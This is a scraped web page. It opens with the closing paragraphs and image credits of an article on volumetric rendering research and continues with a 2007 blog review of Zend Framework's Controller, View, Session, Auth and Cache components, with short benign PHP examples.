    Fajardo also pointed out that he could not (yet) see any ways that Solid Angle could immediately rethink any of their approaches but he commented that, “I like the way he’s thinking – he is forward looking.” Jarosz says the methods he discussed in his talk have been incorporated into Pixar’s PRMan and used by WDAS in the production of feature films. “Specifically, the photon beams method I discussed was added to PRMan 17 last year, and the new SSS method is now in PRMan 18. So, though the talk tries to be forward-looking, we are also definitely concerned with the immediate applicability of our work to improve production rendering.”

    Finally, Jarosz adds that he thinks Fajardo’s paper from 2012 with Christopher Kulla “is one of my favorite papers on volume rendering in recent memory. It really shows clearly how to make several challenging aspects of production volume media rendering more practical. Though it was not pitched/presented as such, I do think their paper also incorporates some aspects of this “revolutionary” way of thinking and eliminating the traditional view on point sampling in media.”

    Footnote: Lighthouse image from A Comprehensive Theory of Volumetric Radiance Estimation Using Photon Points and Beams, Wojciech Jarosz, Derek Nowrouzezahrai, Iman Sadeghi, Henrik Wann Jensen.

    The teapot in a Cornell box image above is from the following publication: “A Programmable System for Artistic Volumetric Lighting,” ACM Transactions on Graphics (Proceedings of ACM SIGGRAPH 2011), August 2011, by Derek Nowrouzezahrai, Jared Johnson, Andrew Selle, Dylan Lacewell, Michael Kaschalk and Wojciech Jarosz.


    Cover image rendered in Maxwell Render. Image courtesy of Hervé Steff, Meindbender.

    Special thanks to Ian Failes.



  • A review of the Zend Framework - Part 2

    http://blog.octabox.com/2007/06/04/a-review-of-the-zend-framework-part-2/

    [This is Part two of a three part review. Part one can be found here]

    When I wrote the previous part of this review, covering the Registry and Database classes of the Zend Framework, the Framework was still at version 0.9.3 Beta. It has since reached version 1.0.0 Release Candidate, and interestingly enough, most of the changes affect the components I’ll be reviewing this time.

    Zend_Controller, Zend_View - Model-View-Controller architecture

    A Model-View-Controller implementation seems to be all the rage these days in web development, and for good reason (though some wonder whether it really is so). Briefly, on the Model-View-Controller pattern: in a (web) application of growing complexity, it becomes paramount to separate logic from the presentational layer, allowing logic to be changed without requiring changes in the presentational layer. Anyone who has developed for the web in a straightforward manner, mixing server side code (e.g. PHP) and presentational code (HTML, CSS), has probably noticed an increasing difficulty in making changes to a script as it grows in size and complexity.
    In a manner of speaking, Style Sheets apply the same logic behind the MVC pattern - allowing separation of information from styling, and reusability of styling code (Style Sheets). For more on the MVC pattern read the Wikipedia page or this article on PHPwact.

    The Zend Framework provides the View and Controller parts of the MVC scheme, with the Model layer provided by the web developer according to the needs of a specific web-development project. Most models involve database access, and the Zend_Db_Table provides the building blocks for such models as I’ve mentioned in Part 1.

    The Zend_Controller class hierarchy revolves around bootstrapping your application through a single script and instantiating a Front Controller in that script (Zend_Controller_Front). The front controller handles incoming requests and dispatches them to Actions in Action Controller scripts (Zend_Controller_Action), Actions simply being methods (class functions) inside such controller classes.
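
    As a rough sketch of what that looks like in ZF 1.0 code (the directory layout here is illustrative, not taken from the review):

        <?php
        // index.php - the single entry point that bootstraps the application
        require_once 'Zend/Controller/Front.php';

        $front = Zend_Controller_Front::getInstance();
        $front->setControllerDirectory('../application/controllers');
        $front->dispatch();   // route the incoming request to a controller action

        // --- application/controllers/IndexController.php ---
        class IndexController extends Zend_Controller_Action
        {
            // handles the default route /index/index
            public function indexAction()
            {
                // fetch data from a model here and hand it to the view
            }
        }

    (In a real project the controller class lives in its own file; it is shown inline here only to keep the sketch short.)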

    The Zend_Controller comes complete with its own Rewrite class (Zend_Controller_Router_Rewrite) which replaces usage of a server implemented rewrite module (such as Apache’s) for all purposes but the initial bootstrapping.

    The Controller scheme of the Zend Framework also provides Request and Response objects representing the incoming server requests (Http or otherwise) and the corresponding responses, and allows to make modifications and retrieve information before and after the dispatching process.

    Also available are Action Helpers and Controller Plugins which allow for the reuse of common code in controller scripts without having to subclass the original Zend_Controller_Action class.

    All in all the Controller implementation of the Zend Framework is one of the most complete I’ve seen and certainly the most agile and extendable, however it’s not without its problems. Up until recently, the View integration in the Controller scripts has been rather non-existent. In previous versions of the framework, one would have to manually set up Views and their scripts, which led to some code redundancy inside a specific controller. In the latest versions, efforts were made to allow for a more streamlined integration of the View class in the controllers, providing several shortcut methods for instantiating and rendering a View, but it’s still not as mature as in some of the other PHP frameworks available.

    The Zend_View class provides the View in the MVC scheme. There are no provided templating systems in the framework, so basic usage through the Zend_View would be rendering templates composed of HTML and inline PHP code. While this is my preferred method of operation, those who feel the need can integrate various templating systems with the Zend_View (here’s a nice article on integrating Smarty with Zend_View).

    Zend_View uses the __get() and __set() magic methods to dynamically insert and retrieve variables / objects in a View. The standard course of action would be to inject some data into the View through the Controller script using a model, and retrieve it for output inside the View (which is basically what the MVC pattern is all about).
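
    A minimal sketch of that hand-off (the 'books' variable, paths and template name are made up for illustration):

        <?php
        // controller / script side: assign data to the view via the magic __set()
        require_once 'Zend/View.php';

        $view = new Zend_View();
        $view->setScriptPath('/path/to/view/scripts');
        $view->books = array('Book A', 'Book B', 'Book C');
        echo $view->render('booklist.php');

        <!-- booklist.php: the template mixing HTML and inline PHP -->
        <ul>
        <?php foreach ($this->books as $title): ?>
            <li><?php echo $this->escape($title); ?></li>
        <?php endforeach; ?>
        </ul>

    Note the use of $this->escape(), one of the built-in view helpers, to avoid echoing raw data straight into the page.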

    Of course, Zend_View comes replete with its own helpers scheme, which is little more than a convenience mechanism for calling up external classes called helpers. Since the framework provides only some basic form input classes at this point, the task of creating user interface classes is left to the web developer. It remains to be seen if this will be remedied in the future, since other frameworks have provided an entire range of user-interface helpers, including some JavaScript and Ajax integration.

    Through the development of the Octabox project, I’ve created my own user-interface class hierarchy for abstraction of HTML and JavaScript operations, including a full set of widget based classes that perform more advanced operations (such as the creation of the Octabox styled window and dialog boxes, the tab based menus, custom select boxes and scrollbars and so forth), as the basis of the Octabox API, so I’m not holding my breath for any breakthrough helper design in the Zend Framework (and there is no indication one is forthcoming).

    Zend_Session - Handling sessions

    Sessions in the web environment allow maintaining state over Http, which is basically a stateless protocol. Users can be assigned unique identification strings which are used to identify them as they traverse a web site, and allow associating data with specific users (which is saved on the server).

    Zend_Session encapsulates PHP session handling in an Object Oriented manner. Namespaces are used to segregate information, helping to avoid collisions (loss of data by accidentally overwriting it, a common occurrence with sessions) by promoting the use of different namespaces for different sets of information, and session namespace locking (preventing modifications to a specific namespace). A short blog on the perils of using sessions can be found here and another one on session security issues can be found here.
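
    A minimal sketch of namespaced session use (the namespace name 'userPrefs' is arbitrary):

        <?php
        require_once 'Zend/Session.php';
        require_once 'Zend/Session/Namespace.php';

        Zend_Session::start();

        $prefs = new Zend_Session_Namespace('userPrefs');
        $prefs->language = 'en';      // stored server-side, keyed to the visitor's session

        $prefs->lock();               // guard this namespace against accidental overwrites
        // $prefs->language = 'fr';   // would now raise an exception

        Zend_Session::regenerateId(); // one of the utility methods mentioned below

    Locking and the utility methods are exactly the kind of small conveniences that make the class worth using even on small projects.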

    Also provided are several useful utility functions such as session ID regeneration, session expiration settings and session termination methods. All in all, Zend_Session helps avoid some common pitfalls when using sessions by using an Object Oriented architecture without increasing complexity, and is a welcome addition to almost any PHP developer’s library. It is used internally by Zend_Auth, which I will cover next.

    Zend_Auth - Authentication

    Authentication in the web environment sense means confirming that a user is who he claims to be based on given credentials. The most common usage of authentication is via a Log-in form, where a user name and password are usually given (i.e. credentials), and are confirmed against credentials information on the server (i.e. authentication).

    Zend_Auth provides several backends for authentication (database, filesystem) as well as common methods for Http authentication (basic and digest), a full review of which is out of scope for this blog. Suffice to say authentication results (called an identity) can be stored in persistent storage, the default being sessions (Zend_Auth uses Zend_Session internally in order to achieve session persistence). An authentication result can be a database row, for example, which can include more than just the user name and password (email address and user ID for example), the persistence of which can be very useful.

    The persistence of identity via Zend_Auth is further enhanced by the fact that Zend_Auth is a singleton pattern implementation, meaning authentication results (i.e. success/failure and the persisted identity) can be called up easily from any script in your web application.
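
    A minimal sketch of database-backed authentication and identity persistence (table and column names are made up for illustration; $db is an existing Zend_Db adapter and the credentials come from a log-in form):

        <?php
        require_once 'Zend/Auth.php';
        require_once 'Zend/Auth/Adapter/DbTable.php';

        $adapter = new Zend_Auth_Adapter_DbTable(
            $db, 'users', 'username', 'password_hash'
        );
        $adapter->setIdentity($username)
                ->setCredential($passwordHash);

        $auth   = Zend_Auth::getInstance();        // singleton
        $result = $auth->authenticate($adapter);

        if ($result->isValid()) {
            // persist the whole user row (minus the credential) rather than just the name
            $auth->getStorage()->write(
                $adapter->getResultRowObject(null, 'password_hash')
            );
        }

        // later, in any other script:
        if (Zend_Auth::getInstance()->hasIdentity()) {
            $user = Zend_Auth::getInstance()->getIdentity();
        }

    Because the identity is written to Zend_Session-backed storage, it survives across requests with no extra work.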

    Zend_Auth and Zend_Session is a perfect example of two Zend Framework components working together without relying exclusively on one another (loose coupling, important!).

    Zend_Cache - Data caching

    Cache (pronounced cash) in computer terminology means storage of data which was computed / fetched previously. The purpose of a cache is to provide faster access to commonly used data and to avoid the cost of fetching / calculating it again. Besides Http requests, which can’t be avoided (unless, of course, you do not wish traffic to your site), the two major resource consuming operations for a traditional web server are database queries and server side script processing (i.e. PHP). By caching data generated from such operations (such as dynamically generated web pages or database query results) into readily available data (such as in system memory or on the local file-system), much load can be taken off a web server (which is good for business).

    Zend_Cache is the Zend Framework answer to a PHP based caching solution. It operates by delegating the information gathering to a front-end class and caching the information using a back-end class.
    Provided front-end classes include a class for capturing output (using PHP’s output buffering), classes for caching function calls and object instances, and classes for caching file-parsing results (such as XML) and complete HTML pages.
    Back-end classes for cache persistence are provided for file storage (basically turning dynamic content into static content for the duration of the cache), SQLite storage (a database implementation that is not an independent system process), memcached storage (a high performance object caching system), APC (Alternative PHP Cache, a PHP extension) and Zend Platform caching (which obviously requires the Zend Platform to be installed).

    The operation of the cache is very simple - you gather the information you want cached using a cache front-end, and store it via a cache back-end. A check for cache existence is then added before the information is generated, and if the cache is found (a cache hit) it is retrieved from the cache storage back-end instead of being dynamically generated.
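
    A minimal sketch of that check-then-generate pattern using the Core front-end and File back-end (the cache directory, cache ID and query are made up for illustration):

        <?php
        require_once 'Zend/Cache.php';

        $frontendOptions = array('lifetime' => 7200, 'automatic_serialization' => true);
        $backendOptions  = array('cache_dir' => '/tmp/zend_cache/');

        $cache = Zend_Cache::factory('Core', 'File', $frontendOptions, $backendOptions);

        $id = 'recent_articles';
        if (($articles = $cache->load($id)) === false) {
            // cache miss: do the expensive work, then store the result
            $articles = $db->fetchAll(
                'SELECT * FROM articles ORDER BY created DESC LIMIT 10'
            );
            $cache->save($articles, $id);
        }
        // $articles is now usable whether it came from the cache or the database

    The same load()/save() pair works unchanged if the File back-end is later swapped for memcached or APC, which is what makes the class so easy to drop into an existing project.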

    Having used Zend_Cache for some time now, I feel that many PHP developers who might have shied away from caching on simpler projects because of a lack of understanding and/or lack of motivation (I know I had this mindset until not so long ago) could definitely use this class as a standalone in almost every project, greatly enhancing their web applications’ performance.

    Next week in the last section of this review, I will go over the Zend_Filter / Zend_Validate combo, Zend_Search_Lucene (a real gem!) and wrap up my impressions of the Zend Framework.

    Comments, questions and clarifications are welcomed and appreciated.

     
